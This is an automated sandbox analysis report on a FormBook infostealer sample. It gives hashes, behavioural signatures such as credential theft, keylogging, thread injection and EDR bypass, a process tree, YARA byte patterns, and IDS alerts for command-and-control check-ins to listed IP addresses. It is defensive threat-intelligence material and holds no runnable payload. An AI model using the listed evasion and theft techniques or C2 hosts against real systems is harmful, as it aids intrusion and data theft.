
Windows Analysis Report
Doc 784-01965670.exe

Overview

General Information

Sample name:Doc 784-01965670.exe
Analysis ID:1539643
MD5:f9d3e00cde42773f49276bfd202813f5
SHA1:79e43e7b0d15c4ed5f8fdd1d1e89edf58d5ec1ac
SHA256:0192d385d59bc9e853e7b58a9e3cf65857b7be49c3ba92185bfd7241a36ccc0d
Tags:exe

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Doc 784-01965670.exe (PID: 5452 cmdline: "C:\Users\user\Desktop\Doc 784-01965670.exe" MD5: F9D3E00CDE42773F49276BFD202813F5)
    • svchost.exe (PID: 2140 cmdline: "C:\Users\user\Desktop\Doc 784-01965670.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • jEsBIhfnof.exe (PID: 2520 cmdline: "C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • schtasks.exe (PID: 3528 cmdline: "C:\Windows\SysWOW64\schtasks.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
          • jEsBIhfnof.exe (PID: 1536 cmdline: "C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6468 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ebf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16e92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(11 further entries not shown in the extracted page)
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16092:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ebf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16e92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Doc 784-01965670.exe", CommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", ParentImage: C:\Users\user\Desktop\Doc 784-01965670.exe, ParentProcessId: 5452, ParentProcessName: Doc 784-01965670.exe, ProcessCommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", ProcessId: 2140, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Doc 784-01965670.exe", CommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", ParentImage: C:\Users\user\Desktop\Doc 784-01965670.exe, ParentProcessId: 5452, ParentProcessName: Doc 784-01965670.exe, ProcessCommandLine: "C:\Users\user\Desktop\Doc 784-01965670.exe", ProcessId: 2140, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T22:56:30.782310+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 52994 | 188.114.97.3 | 80 | TCP
2024-10-22T22:56:54.995827+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53101 | 52.13.151.179 | 80 | TCP
2024-10-22T22:57:16.920286+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53196 | 103.106.67.112 | 80 | TCP
2024-10-22T22:57:30.667198+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53215 | 188.114.96.3 | 80 | TCP
2024-10-22T22:57:44.059111+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53219 | 3.33.130.190 | 80 | TCP
2024-10-22T22:57:57.606581+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53223 | 217.70.184.50 | 80 | TCP
2024-10-22T22:58:11.229555+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53227 | 94.23.162.163 | 80 | TCP
2024-10-22T22:58:25.173782+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53231 | 103.224.182.242 | 80 | TCP
2024-10-22T22:58:38.635814+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53235 | 209.74.64.187 | 80 | TCP
2024-10-22T22:58:52.300187+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53239 | 65.21.196.90 | 80 | TCP
2024-10-22T22:59:05.960240+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53243 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:19.353782+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53247 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:33.674797+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53251 | 8.210.49.139 | 80 | TCP
2024-10-22T22:59:48.035272+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53255 | 94.23.162.163 | 80 | TCP
2024-10-22T23:00:05.311558+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 53256 | 188.114.97.3 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T22:56:47.092076+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53065 | 52.13.151.179 | 80 | TCP
2024-10-22T22:56:49.901782+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53080 | 52.13.151.179 | 80 | TCP
2024-10-22T22:56:53.020839+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53092 | 52.13.151.179 | 80 | TCP
2024-10-22T22:57:09.236356+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53160 | 103.106.67.112 | 80 | TCP
2024-10-22T22:57:11.792564+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53171 | 103.106.67.112 | 80 | TCP
2024-10-22T22:57:14.327473+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53184 | 103.106.67.112 | 80 | TCP
2024-10-22T22:57:22.860956+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53212 | 188.114.96.3 | 80 | TCP
2024-10-22T22:57:25.455548+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53213 | 188.114.96.3 | 80 | TCP
2024-10-22T22:57:28.095585+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53214 | 188.114.96.3 | 80 | TCP
2024-10-22T22:57:36.418936+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53216 | 3.33.130.190 | 80 | TCP
2024-10-22T22:57:38.963511+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53217 | 3.33.130.190 | 80 | TCP
2024-10-22T22:57:41.471377+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53218 | 3.33.130.190 | 80 | TCP
2024-10-22T22:57:50.026061+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53220 | 217.70.184.50 | 80 | TCP
2024-10-22T22:57:52.573055+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53221 | 217.70.184.50 | 80 | TCP
2024-10-22T22:57:55.121101+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53222 | 217.70.184.50 | 80 | TCP
2024-10-22T22:58:03.728578+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53224 | 94.23.162.163 | 80 | TCP
2024-10-22T22:58:06.241903+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53225 | 94.23.162.163 | 80 | TCP
2024-10-22T22:58:08.699956+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53226 | 94.23.162.163 | 80 | TCP
2024-10-22T22:58:17.396447+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53228 | 103.224.182.242 | 80 | TCP
2024-10-22T22:58:19.957028+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53229 | 103.224.182.242 | 80 | TCP
2024-10-22T22:58:22.627976+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53230 | 103.224.182.242 | 80 | TCP
2024-10-22T22:58:30.955570+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53232 | 209.74.64.187 | 80 | TCP
2024-10-22T22:58:33.520112+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53233 | 209.74.64.187 | 80 | TCP
2024-10-22T22:58:36.071268+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53234 | 209.74.64.187 | 80 | TCP
2024-10-22T22:58:44.668685+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53236 | 65.21.196.90 | 80 | TCP
2024-10-22T22:58:47.257463+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53237 | 65.21.196.90 | 80 | TCP
2024-10-22T22:58:49.776104+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53238 | 65.21.196.90 | 80 | TCP
2024-10-22T22:58:58.205425+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53240 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:00.766304+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53241 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:03.372904+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53242 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:11.703664+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53244 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:14.238086+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53245 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:16.757788+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53246 | 3.33.130.190 | 80 | TCP
2024-10-22T22:59:26.225331+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53248 | 8.210.49.139 | 80 | TCP
2024-10-22T22:59:28.648693+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53249 | 8.210.49.139 | 80 | TCP
2024-10-22T22:59:31.229419+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53250 | 8.210.49.139 | 80 | TCP
2024-10-22T22:59:39.969207+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53252 | 94.23.162.163 | 80 | TCP
2024-10-22T22:59:42.814443+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53253 | 94.23.162.163 | 80 | TCP
2024-10-22T22:59:45.245233+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 53254 | 94.23.162.163 | 80 | TCP



            AV Detection

Source: Doc 784-01965670.exe | ReversingLabs: Detection: 52%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Doc 784-01965670.exe | Joe Sandbox ML: detected
Source: Doc 784-01965670.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: schtasks.pdb | source: svchost.exe, 00000002.00000003.2188818798.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2188967652.000000000345A000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.0000000000924000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: jEsBIhfnof.exe, 00000003.00000002.4509238213.0000000000C2E000.00000002.00000001.01000000.00000004.sdmp, jEsBIhfnof.exe, 00000006.00000000.2290300485.0000000000C2E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: Doc 784-01965670.exe, 00000000.00000003.2052253285.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, Doc 784-01965670.exe, 00000000.00000003.2051685242.0000000004620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130236373.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131854715.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2223204393.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2224989502.0000000002D01000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.000000000304E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Doc 784-01965670.exe, 00000000.00000003.2052253285.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, Doc 784-01965670.exe, 00000000.00000003.2051685242.0000000004620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2130236373.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131854715.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000003.2223204393.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2224989502.0000000002D01000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.000000000304E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: schtasks.exe, 00000004.00000002.4510450854.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.0000000000763000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2509345091.000000003CE2C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: schtasks.pdbGCTL | source: svchost.exe, 00000002.00000003.2188818798.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2188967652.000000000345A000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.0000000000924000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: schtasks.exe, 00000004.00000002.4510450854.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.0000000000763000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2509345091.000000003CE2C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00452126
Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose | 0_2_0045C999
Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00436ADE
Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00434BEE
Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_0045DD7C FindFirstFileW,FindClose | 0_2_0045DD7C
Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose | 0_2_0044BD29
Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle | 0_2_00436D2D
Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00442E1F
Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_00475FE5
Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_0044BF8D
Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_0045C310 FindFirstFileW,FindNextFileW,FindClose | 4_2_0045C310
Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4x nop then xor eax, eax | 4_2_00449B90
Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4x nop then mov ebx, 00000004h | 4_2_02B504E1

            Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:52994 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53080 -> 52.13.151.179:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53065 -> 52.13.151.179:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53092 -> 52.13.151.179:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53160 -> 103.106.67.112:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53171 -> 103.106.67.112:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53213 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53216 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53241 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53220 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53212 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53221 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53250 -> 8.210.49.139:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53227 -> 94.23.162.163:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53219 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53243 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53254 -> 94.23.162.163:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53215 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53247 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53225 -> 94.23.162.163:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53229 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53237 -> 65.21.196.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53245 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53226 -> 94.23.162.163:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53214 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53249 -> 8.210.49.139:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53251 -> 8.210.49.139:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53218 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53235 -> 209.74.64.187:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53234 -> 209.74.64.187:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53246 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53242 -> 3.33.130.190:80
